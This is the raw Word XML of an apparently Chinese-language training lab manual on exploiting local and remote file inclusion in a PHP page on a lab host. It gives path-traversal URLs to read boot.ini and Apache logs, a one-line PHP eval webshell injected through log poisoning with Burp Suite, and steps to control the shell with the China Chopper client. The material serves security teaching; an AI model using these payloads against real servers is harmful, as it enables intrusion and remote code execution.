          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>客户机一台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仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋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仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋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8E0FBB" w:rsidRPr="008E0FBB" w:rsidRDefault="008E0FBB" w:rsidP="008E0FB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1、访问http://www.any.com/FI/PHP_FI.php?filename=LFI.txt网页显示是文件包含漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E0FBB" w:rsidRPr="008E0FBB" w:rsidRDefault="008E0FBB" w:rsidP="008E0FBB">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
        <w:spacing w:after="240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DE8C0FE" wp14:editId="7540BB7E">
            <wp:extent cx="4714875" cy="1890451"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="69" name="图片 6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mag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9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jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21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2、访问</w:t>
      </w:r>
      <w:r w:rsidRPr="008E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋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http://www.any.com/FI/PHP_FI.php?filename=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋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..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋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/../../../../boot.ini</w:t>
      </w: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t>可以查看c:/boot.ini的信息,确认有本地文件包含漏洞。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 w:hint="eastAsia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4F65CE34" wp14:editId="0FA47D48">
            <wp:extent cx="4867275" cy="1788333"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="68" name="图片 6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a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78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3、尝试访问其他常见的路径，比如access.log，访问http://www.any.com/FI/PHP_FI.php?filename=</w:t>
      </w:r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..</w:t>
      </w:r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>/../../../../Program%20Files/phpStudy/Apache/logs/access.log可以访问。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3466E536" wp14:editId="6A7408FA">
            <wp:extent cx="3600450" cy="2611079"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="67" name="图片 6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mag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83" cy="261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4、浏览器设置代理服务的步骤：点击网页右上角，选择【选项】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00896027" wp14:editId="313A58EA">
            <wp:extent cx="4981575" cy="3618635"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="66" name="图片 6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ag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【高级】—【网络】—【设置】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671CAF3" wp14:editId="76838542">
            <wp:extent cx="4819650" cy="2660309"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="65" name="图片 6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mag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6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lastRenderedPageBreak/>
        <w:t>选择【手动配置代理】，输入HTTP代理127.0.0.1，端口8080，清空不使用代理下方的文本框，点击确定。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E9C2748" wp14:editId="379BBF69">
            <wp:extent cx="2744015" cy="3228975"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="64" name="图片 6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imag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双击桌面的【实验手册】，打开【burpsuite_pro_v1.5.14.jar】,点击【OK】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6D0AF935" wp14:editId="59074CD4">
            <wp:extent cx="5076825" cy="1143000"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="63" name="图片 6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mag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点击【I Accept】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081B547C" wp14:editId="1B84C901">
            <wp:extent cx="3419475" cy="1343025"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="62" name="图片 6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mag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 w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>刷新浏览器的http://www.any.com/FI/PHP_FI.php?filename=LFI.txt网页</w:t>
      </w:r>
      <w:r w:rsidRPr="008E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，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burpsuite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自动抓包，修改为如下。命令是&lt;?</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> @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eval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($_POST[1]);?&gt;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01FE86E" wp14:editId="73249F39">
            <wp:extent cx="5676900" cy="1786119"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="61" name="图片 6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7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修改完毕，点击【Forward】按钮。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浏览器会提示，如下图。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EFD30B0" wp14:editId="3241A7D4">
            <wp:extent cx="4279316" cy="1390650"/>
            <wp:effectExtent l="0" t="0" r="6985" b="0"/>
            <wp:docPr id="60" name="图片 6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imag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16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5、双击桌面的【实验工具】文件夹，双击打开【中国菜刀】文件夹。找到【中国菜刀.exe】,并双击打开。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空白处右击，选择【添加】。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1BD04C54" wp14:editId="210D03F7">
            <wp:extent cx="4886325" cy="1353387"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="59" name="图片 5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ag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3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输入地址http://www.any.com/FI/PHP_FI.php?filename=../../../../../Program Files/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phpStudy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/Apache/logs/access.log，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地址后的文本框是密码，此处是1，脚本类型选择【PHP(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Eval</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)】，点击【添加】。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5DDF38" wp14:editId="2B491B92">
            <wp:extent cx="4495800" cy="2828925"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="58" name="图片 5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imag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结果如下图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2EB37AAB" wp14:editId="3675C8AA">
            <wp:extent cx="5143500" cy="1323105"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="57" name="图片 5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imag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双击上图中的</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>蓝框</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>部分即可运行。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结果如下图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noProof/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F9FF3BA" wp14:editId="16561BD6">
            <wp:extent cx="5133975" cy="1100138"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="56" name="图片 5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0FBB">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>6、实验完毕，关闭虚拟机和所有窗口。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E0FBB" w:rsidRDefault="008E0FBB">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E0FBB" w:rsidRPr="008E0FBB" w:rsidRDefault="008E0FBB" w:rsidP="008E0FBB">
      <w:pPr>
        <w:widowControl/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="4" w:color="EEEEEE"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="240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54"/>
          <w:szCs w:val="54"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="008E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="36"/>
          <w:sz w:val="54"/>
          <w:szCs w:val="54"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>远程文件包含shell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</w:pPr>
      <w:r w:rsidRPr="008E0FBB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预备知识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程序开发人员通常会把可重复使用的函数写到单个文件中，在使用某些函数时，直接调用此文件，无须再次编写，这种调用文件的过程称为包含。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实验目的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远程文件包含</w:t>
      </w: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shell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实验工具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火狐浏览器菜刀软件工具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实验环境</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E0FBB" w:rsidRPr="008E0FBB" w:rsidRDefault="008E0FBB" w:rsidP="008E0FBB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客户机一台（操作系统为</w:t>
      </w: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Windows Server 2003</w:t>
      </w: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）服务器一台（操作系统为</w:t>
      </w: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Windows Server 2003</w:t>
      </w:r>
      <w:r w:rsidRPr="008E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E0FBB" w:rsidRPr="008E0FBB" w:rsidRDefault="008E0FBB" w:rsidP="008E0FBB">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7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  <w:r w:rsidRPr="008E0FBB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实验步骤</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E0FBB" w:rsidRPr="008E0FBB" w:rsidRDefault="008E0FBB" w:rsidP="008E0FBB">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7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8E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1、访问</w:t>
      </w:r>
      <w:r w:rsidRPr="008E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t>http://www.any.com/FI/PHP_FI.php?filename=RFI.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="008E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，网页显示是远程文件包含漏洞。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8275" cy="1033423"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="77" name="图片 77" descr="http://192.168.29.251/Public/course/561e545e-8108-4298-bd2f-39cf8f417b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192.168.29.251/Public/course/561e545e-8108-4298-bd2f-39cf8f417b6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2、访问网址http://www.any.com/yi.txt，可以看到可以访问的木马。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5450" cy="1390178"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="76" name="图片 76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a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89" cy="139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3.访问</w:t>
      </w:r>
      <w:r w:rsidRPr="008E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>http://www.any.com/FI/PHP_FI.php?filename=http://www.any.com/yi.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="008E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>会在当前目录生成一句话木马</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>a.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008E0FBB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9929" cy="1522942"/>
            <wp:effectExtent l="0" t="0" r="3810" b="1270"/>
            <wp:docPr id="75" name="图片 7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5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56" cy="15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1150" cy="2611592"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="74" name="图片 74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3、打开桌面的【实验工具】文件夹，双击打开【中国菜刀】文件夹，找到【中国菜刀.exe】，双击打开。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利用远程文件漏洞用菜刀连接，空白处右击选择【添加】。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24450" cy="3217168"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="73" name="图片 7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4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地址处填写http://www.any.com/FI/a.php，地址后的文本框是连接密码，此处是1。类型选择【PHP(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Eval</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008E0FBB">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)】。完成后点击【添加】。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8050" cy="3228635"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="72" name="图片 72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42" cy="322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添加完毕，双击新添加的记录进行运行，结果如下：</w:t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5502" cy="2770702"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="71" name="图片 71" descr="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d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30" cy="277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BB" w:rsidRPr="008E0FBB" w:rsidRDefault="008E0FBB" w:rsidP="008E0FBB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0FBB">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4、实验完毕，关闭虚拟机和所有窗口。</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="008E0FBB" w:rsidRPr="008E0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051"/>
    <w:rsid w:val="00377BD1"/>
    <w:rsid w:val="008E0FBB"/>
    <w:rsid w:val="00991043"/>
    <w:rsid w:val="0099378B"/>
    <w:rsid w:val="00D2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937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937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378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9378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pername">
    <w:name w:val="pername"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="0099378B"/>
  </w:style>
  <w:style w:type="character" w:styleId="a3">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0099378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37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937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378B"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="el-checkboxinput">
    <w:name w:val="el-checkbox__input"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="0099378B"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a5">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0099378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9378B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99378B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99378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937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937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378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9378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pername">
    <w:name w:val="pername"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="0099378B"/>
  </w:style>
  <w:style w:type="character" w:styleId="a3">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0099378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37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937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378B"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="el-checkboxinput">
    <w:name w:val="el-checkbox__input"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="0099378B"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a5">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0099378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9378B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99378B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9937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6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8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994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29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87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1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8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54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1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7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628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23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804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652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27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7297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054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661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4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042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9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3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1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38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08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70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1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17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3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40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13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58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747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761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638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4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140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073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0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5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8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0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499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50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56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5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7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9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8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2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83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87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1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828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7229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100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1991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823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424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12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5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0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3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7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9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03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80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65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6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16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75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1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82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66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88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638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5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7472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0246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3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59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70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7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6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5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20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44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91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73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8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2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86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6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59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6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90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71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42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011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3997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7070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427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34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8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7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56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95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39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9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8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74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92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053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70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285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561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3969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636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59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3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4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66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0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062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7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343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8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66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37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9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75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35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672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79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468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347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3490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62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39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04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66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6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2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47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22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35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3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8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33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7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21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29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46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50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921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78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193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753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917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540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941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8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36</Pages>
  <Words>862</Words>
  <Characters>4919</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>40</Lines>
  <Paragraphs>11</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>5770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mxw</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>mxw</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-07-12T08:45:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-07-12T09:19:00Z</dcterms:modified>
</cp:coreProperties>
</file>